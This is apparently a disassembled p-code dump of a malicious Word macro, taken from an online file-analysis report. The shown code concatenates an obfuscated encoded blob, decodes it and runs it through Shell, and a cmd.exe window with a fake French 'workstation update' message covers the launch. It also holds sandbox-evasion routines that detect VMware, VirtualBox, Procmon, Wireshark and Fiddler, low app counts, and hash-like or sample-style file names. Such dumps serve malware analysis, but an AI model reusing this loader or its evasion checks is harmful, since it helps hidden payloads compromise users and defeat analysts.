' LitStr 0x01F4 "Lbvve=yPhmDUR8Ih2IwnCmmKS9v7eW4ADg8TwngYeX7UJgHslgJdYMH1wBCRiEftt4gBrx=oK9N6fMUHamHA04git0oBNwmdAZLPgu+NZqdblO3og/1VNG3S3dKY2y=q+vfXW9r7sSYhr6p5l3=IKewA6M9R5d73e4Um4bDHd=MXhx8RRK97erRngzMObzfB6W4D8fiyS4fpenw1Jg+jYNDdzoP1Y1Cd1Bfq24YrPbnHK6MefheSa17AFwa3gro+xwm7=5/eJu09Z3RXldOggChVsEwc5dK0O7=gbMr/zYdTs0B6rkkzlhgIs8rgAp27mA75247t4bbHd=6phHXYJVK7h8f=pwWxYOfSlr6KiWbpSogle1pHJRSjtjeK/oPvlxCLiBrsH8tePym/Klgh62wSEwGAmQaInSoqAwN5D58aJY7TZwBXYcDgIgZJ5C3yvgKwO7yIbMlxz=b9sTDLcpzzdVMmbdjqnp2FcL7624EO4b7kdUp1"
' St TkvnhzpvknoLxyTmn
' Line #77:
' LitStr 0x01F4 "QTzYOKI/ee=8p2WvUfrw1rx8iWLNSo0D/p7HcyBlhOelqYPnlxkEGEv8H+lDPYa/zghhnILcDHdskQaJISoGVwjXD5U=JjdFoQhXViYz/1Zlq33h3gxe27f9bIDwz6cTbrSLfd/8qjMgG9j9XpGUBA5A24oL4BkugU819jnqOgIy5j=xENFQQfdp1h68iLINSsXDQQ8k8iB3vJeYloPL1xLGGMdeHhrDBan/cFshTtLVwSd=m5fEISuOV=gNDKemUzYF3nFwvGNiCLZWVtU3U92m27ESbgY+GHbTK+YVq1/qqsM/tg3LFp+DBECs2O5q7I0uMc0fyHnMJgIjcejKCNpwQuro12CQhI=NJzeDq+LJ8EBglztglo501BCVGybeUasDFbh/9gsnSML4zHl=EQMVI0JDVIWMFB7mhQYFIqFVl3NdxKZA93bBU6Kb2ZrzSVY+kwf1lqNPqd/Evsd779izFHaGByNjDRUqLbvs1c0KXcnfgVOF"
' St fXhXNVEleO
' Line #78:
' LitStr 0x01F4 "2jfYC/oCQ7bNPmfQTm87m4XfqvLFfBH1lzW3lcPP1sLDtg=ewhgRFxh3T9siqvL+anaEEwcVITCWON3Mbh8UsjYJSPFRl3BDg1H/938HUrKs2qNzRMf+w9frAqNUIgvolvp4768AFM+DlC5jhHzqHxvE6c0ThmnRRgV12jE6CAuKRgcN4r4XTg8W=IXkupXuJESFlzcgle51PICD=FvTpagTYbh0T9MWfMwAanh1EK6iILQWxwmM8ZL/JuYiTPIWl3P8g1=t9bbSU3/s67=zttfNzYf/sSBur9iRlSh/7krAm7tDAb7lT2UIVxvt/k0OhmOTR8Al2MNnxreKYav7g94A0W88+4XEeXOyJMWFlrDdlUb1WGIRyPfB58g1Jx=hK9cufIUAaudA04UiB0oB1wmy=5Ljgu+DZqcOlp+3gT6VWRmSvsuYcn=Pfvf5w9rosSYBrkpSlLdIlEiA6Q9R3k7374UGHx5Hd=JlhLwRRTi7eeBng/WO"
' St NJqYJJYErv
' Line #79:
' LitStr 0x01F4 "MVfBWr408fi9S4eVeuL1JrTjYJ6ddlPfeACT5Pf7B4YdPbaCKkMhf0xS4HEA/wa3=roFUFmjD5XdJuwFZdValODg2yZVacwck9KM77=r5MNwzYcEsTPKr/7zlmUIGgjgmo2T3A7H247t4bGndK2PhQzYJgK7O7==5NWBZOf+YW60iWTmSTQGeDiHJR7jtjeKKbPbWxCL2BPiH8rpPbG/KkOhei7Sk/dAV5aLRSox1FNDD5neJYMFZblXYwAgPKZJnC3IkdKH8yjEbM7Dzib9s4WLc6CzVVMIt9juAs2urACI24wH4EGZdn61QmbYOhA/02=f5NWdUfrA1rdZiCVNSJdD//CHWF+lYzelboPsR1kRGEdSH+YDPan/z/XhUgLcendLEQauqqR0VwQTDN79J50FZkFXbEYzGgZ6hG3TU9xO27LIb8b+zXbTsLPLp8i8hvMKs9j3FpGMBAxv2TSq4YCugk21DrnqODIo2j=/ENWbQfdw1hPR"
' St hDXThtgUsEh
' Line #80:
' LitStr 0x01F4 "imzNH2lDkvLkNiB3/RefdYSA1xI6GgYeHTsDBbN/fkcM65LaKndjFQfWISiDVsmNDv/mN90F3tdwqGNYb1Zz93UqU9Qk27iSbVd+GifTC4NVG9/YYvMNG93QFpLGBz6022Sq7avu12JfHrn9HgIR8ej4CNu5Qu1o1bQQhCqNmqeRyvLJ7BB9tztMloAR1x4VGg=eUTrDYuh9F1sCSMLdKnlbEQMVI0vDVI+MDnem8jYHoWFpdtNqg1Z093mTUkxD2eNzS27+kxf1frN7Ld/pvsdN79BzFprlBdCje26qzBmswU0ZXcncoVOi2jfYCpoKQzcN4VQQ8g87H2XMCXL/JEBTlzwjlcH11+ODTJ=ewftRF/hs=gsVxM/QanGOEwRVIrTWOTQMqBLmL7YwTPFzvt8pg1hp9pwOUldse78z53vIkxfZgqNUfgvRlv=n763AFEoD3K6j64UqkYv+zk0AUcnvRgvH2xMxCiMKQ3fNlq4QYf8v+4Xr"
' St rkqdOMkxmnSp
' Line #81:
' LitStr 0x01F4 "upXLJEUFljeBl5L1PZLDCvveg4gfYbhH9g9XfMeSanhvEF1inx7WxGmMQ5L2L7YWZqF3l3gWg1=Y9D3Sdelsce=zftfAA9fHsSBWr9GolvWI7kVAm7rDlQqjTnUPBbvF/k0lhmSKR80S21jnCZWKUav7wq4zSW8gwnXIeXx1JMUsle6dYoX1W/IRCiftgagkPb=oK9XHfMUAaDEA0E1izoUWuFmO=5Lxf7+IZqNjlpAfgThV9jwS+1KY7n=JtvfuzYrSsSwur6V5l4WIl1HAnx9D5L7i0nUZzbv4d=ThhLzrRAO72o=ngJMOZVfqg94hHf8fS4AGeucHJgOjzKvdzbPf49Cd8PfoH8g=PbnuK9OQfSwSaJFAZ1aigSorzwmuvZX=JuwTZ3NXlD+gglHVNC3c+9KIRy=QbMrzzYdUsSOLr17zYLYIKEjABs2dlA7nO4Q44b04d=c1hjOYJT87D7==x4WRMVfs1r4UiWVmSTeVeuSHNg+j"
' St WauMdbKKmxueesFlTRlH
' Line #82:
' LitStr 0x01F4 "adedSoPElxC6iBr7H8rGPEA/K/3hfs8SkmdgkCa6MqodVwNGD5hfJudmZdtXY=AgbyZJB33V3gKX8yjUbMc7zib9soBLrsizzZMmsdjL5b2BBACw24ER4bfZdqY1QHWYOXA7Te=z72WyUffr1rCGiWFESuXD/hiHhYBlSzeu/lPAY1C=GE7LHlgVPBn/zkchUgLcamduFQaFRSReVwQsD53GJj+FokFXaCNgwKZ6N33AegxL27LIb8fwzZ2Tb=WLtkiz8sM7K9jRabGIBAg=2olE4v9ugfp1lI1Y8gIBej=e72FNQfvw1h6/iIiNHHeD+nLkaiBizzeBtoSM1xYaGgf3HTUDB58/+kcMetLq4ndym5faISUVV=jXD3UmNBNF3odwKCN9KLZvVt3KU9/e27nzb01+GHbTK+YLU9/3VsM279uCFpLGBE5j2Omq7LeusmJ1UHnooVIm2j=pCNolQfTN1CPQhgqNJ2XDy+LTsPBnvJdnlobG"
' St wxpLHjNnjVZ
' Line #83:
' LitStr 0x01E4 "1xWDGU2eUa5D7va/tgsKxML2anRfEQ6uIS/iVROMVa7mF80HkWF8cGNag1Q493bSU9db2ZfzbJf+kxf1rxNQp9/5tvo=79MiFH+VBd6j2x4qzYvsec0KlcnboVOU2jgiC/WCQzbNPh4QSC87m4XT/XL/JEB6lzKMlc9h1ILDGGce5NgRf/hS8gsiqvL+anj7EGg2In7WV7mMqvLU74YK3qFmt3B1g1hV938OU8lsenBzNif+v9frCSNtr9vllvS/76jiFaoDBW7jO2Ui//v7e=0hHm8bRgVS2jE6CApKQ3fNmq4XiP82+4XG8XLbJEFsljtBlbR1PZLDCifT58gMf/he9gsLfM80ad71EMRinLQWzrg+VuLOF7Y03qJil3RDgGWt9iHSUsusDNfz1vfN9YfcAqNsr9p5lShI7/1AmO2Drz7jcnUUHxvad=ykhmpBRgCl2Ipn5AmKS3fNe94eHf8D+4gMeXc8JCMQ"
' St pUCAotjVuCQBfkftGrwC
' Line #84:
' Ld EKKdVAjzttW
' Ld cTdzQWOUWEEVexjiF
' Add
' Ld TkvnhzpvknoLxyTmn
' Add
' Ld fXhXNVEleO
' Add
' Ld NJqYJJYErv
' Add
' Ld hDXThtgUsEh
' Add
' Ld rkqdOMkxmnSp
' Add
' Ld WauMdbKKmxueesFlTRlH
' Add
' Ld wxpLHjNnjVZ
' Add
' Ld pUCAotjVuCQBfkftGrwC
' Add
' St JSYKsfbkulFLwzF
' Line #85:
' LitStr 0x0052 "Wsv5LQjsp7Zk1zTJ95XU84d+wa7Ve/4016/BFfco2xictpul+bCcDzOsPL1G/F0ki9sviME+tZQsbFihVP"
' St ilCuylucYGMVsPGKnYyE
' Line #86:
' Ld JSYKsfbkulFLwzF
' Ld ilCuylucYGMVsPGKnYyE
' ArgsLd yVUjdHcKUhdsSMTTyQ 0x0002
' ArgsLd fCIvqJuUQOrDpoAFFD 0x0001
' Ld StrConv
' ArgsLd kQZqdoRefXB 0x0002
' Paren
' ArgsCall Shell 0x0001
' Line #87:
' LitStr 0x00AB "cmd.exe /K ECHO Mise a jour de la station de travail %COMPUTERNAME% pour %USERNAME%, veuillez patienter... & ping -n 6 127.0.0.1 > nul & ECHO Mise a jour a jour complete !"
' Ld vbNormalFocus
' ArgsCall (Call) Shell 0x0002
' Line #88:
' Line #89:
' EndSub
' Line #90:
' Line #91:
' FuncDefn (Public Function checkApps() As Boolean)
' Line #92:
' Line #93:
' Line #94:
' LitVarSpecial (False)
' St d
' Line #95:
' LitStr 0x0006 "vmware"
' LitStr 0x0007 "vmtools"
' LitStr 0x0004 "vbox"
' LitStr 0x0010 "process explorer"
' LitStr 0x000D "processhacker"
' LitStr 0x0007 "procmon"
' LitStr 0x000C "visual basic"
' LitStr 0x0007 "fiddler"
' LitStr 0x0009 "wireshark"
' ArgsArray Array 0x0009
' St tns
' Line #96:
' SetStmt
' LitStr 0x0017 "winmgmts:\\.\root\cimv2"
' ArgsLd GetObject 0x0001
' Set ws
' Line #97:
' Line #98:
' Dim
' VarDefn names
' Line #99:
' OptionBase
' Ld WordBasic
' ArgsMemLd AppCount 0x0000
' Redim names 0x0001 (As Variant)
' Line #100:
' Line #101:
' Ld names
' Ld WordBasic
' ArgsMemCall AppGetNames 0x0001
' Line #102:
' Line #103:
' StartForVariable
' Ld n
' EndForVariable
' Ld names
' ForEach
' Line #104:
' StartForVariable
' Ld tn
' EndForVariable
' Ld tns
' ForEach
' Line #105:
' Ld n
' ArgsLd LCase 0x0001
' Ld tn
' FnInStr
' LitDI2 0x0000
' Gt
' IfBlock
' Line #106:
' LitVarSpecial (True)
' St d
' Line #107:
' EndIfBlock
' Line #108:
' StartForVariable
' Next
' Line #109:
' StartForVariable
' Next
' Line #110:
' Line #111:
' Ld d
' IfBlock
' Line #112:
' Line #113:
' LitVarSpecial (True)
' St checkApps
' Line #114:
' Line #115:
' ElseBlock
' Line #116:
' Line #117:
' LitVarSpecial (False)
' St checkApps
' Line #118:
' EndIfBlock
' Line #119:
' Line #120:
' EndFunc
' Line #121:
' Line #122:
' FuncDefn (Public Function checkAppCount() As Boolean)
' Line #123:
' Line #124:
' Ld WordBasic
' ArgsMemLd AppCount 0x0000
' LitDI2 0x0032
' Lt
' IfBlock
' Line #125:
' Line #126:
' LitVarSpecial (True)
' St checkAppCount
' Line #127:
' Line #128:
' ElseBlock
' Line #129:
' Line #130:
' LitVarSpecial (False)
' St checkAppCount
' Line #131:
' EndIfBlock
' Line #132:
' Line #133:
' EndFunc
' Line #134:
' Line #135:
' FuncDefn (Public Function checkPreciseFileName() As Boolean)
' Line #136:
' Line #137:
' Line #138:
' LitVarSpecial (False)
' St badName
' Line #139:
' Line #140:
' Line #141:
' Ld ActiveDocument
' MemLd Name
' LitStr 0x000B "Pafish.docm"
' Ne
' IfBlock
' Line #142:
' LitVarSpecial (True)
' St badName
' Line #143:
' EndIfBlock
' Line #144:
' Line #145:
' Ld badName
' IfBlock
' Line #146:
' Line #147:
' LitVarSpecial (True)
' St checkPreciseFileName
' Line #148:
' ElseBlock
' Line #149:
' Line #150:
' LitVarSpecial (False)
' St checkPreciseFileName
' Line #151:
' EndIfBlock
' Line #152:
' Line #153:
' EndFunc
' Line #154:
' Line #155:
' FuncDefn (Public Function checkFilenameHash() As Boolean)
' Line #156:
' Line #157:
' Line #158:
' LitStr 0x0010 "0123456789abcdef"
' St hexchars
' Line #159:
' Line #160:
' LitDI2 0x0000
' St c
' Line #161:
' Line #162:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld ThisDocument
' MemLd Name
' FnLen
' For
' Line #163:
' Ld ThisDocument
' MemLd Name
' ArgsLd LCase 0x0001
' Ld i
' LitDI2 0x0001
' ArgsLd Mid 0x0003
' St s
' Line #164:
' Line #165:
' Ld s
' Ld hexchars
' FnInStr
' LitDI2 0x0000
' Gt
' IfBlock
' Line #166:
' Ld c
' LitDI2 0x0001
' Add
' St c
' Line #167:
' EndIfBlock
' Line #168:
' Line #169:
' StartForVariable
' Next
' Line #170:
' Line #171:
' Ld c
' Ld ThisDocument
' MemLd Name
' FnLen
' LitDI2 0x0005
' Sub
' Paren
' Ge
' IfBlock
' Line #172:
' LitVarSpecial (True)
' St checkFilenameHash
' Line #173:
' Line #174:
' ElseBlock
' Line #175:
' Line #176:
' Line #177:
' LitVarSpecial (False)
' St checkFilenameHash
' Line #178:
' EndIfBlock
' Line #179:
' Line #180:
' EndFunc
' Line #181:
' Line #182:
' FuncDefn (Public Function checkFilenameBad() As Boolean)
' Line #183:
' Line #184:
' Line #185:
' LitVarSpecial (False)
' St badName
' Line #186:
' LitStr 0x0007 "malware"
' LitStr 0x0005 "myapp"
' LitStr 0x0006 "sample"
' LitStr 0x0004 ".bin"
' LitStr 0x0005 "mlwr_"
' LitStr 0x0007 "Desktop"
' ArgsArray Array 0x0006
' St badNames
' Line #187:
' Line #188:
' Line #189:
' StartForVariable
' Ld n
' EndForVariable
' Ld badNames
' ForEach
' Line #190:
' Ld ActiveDocument
' MemLd FullName
' ArgsLd LCase 0x0001
' Ld n
' FnInStr
' LitDI2 0x0000
' Gt
' IfBlock
' Line #191:
' LitVarSpecial (True)
' St badName
' Line #192:
' EndIfBlock
' Line #193:
' StartForVariable
' Next
' Line #194:
' Line #195:
' Line #196:
' Ld badName
' IfBlock
' Line #197:
' Line #198:
' LitVarSpecial (True)
' St checkFilenameBad
' Line #199:
' ElseBlock
' Line #200:
' Line #201:
' LitVarSpecial (False)
' St checkFilenameBad
' Line #202:
' EndIfBlock
' Line #203:
' Line #204:
' EndFunc
' Line #205:
' Line #206:
' FuncDefn (Public Function checkTasks() As Boolean)
' Line #207:
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.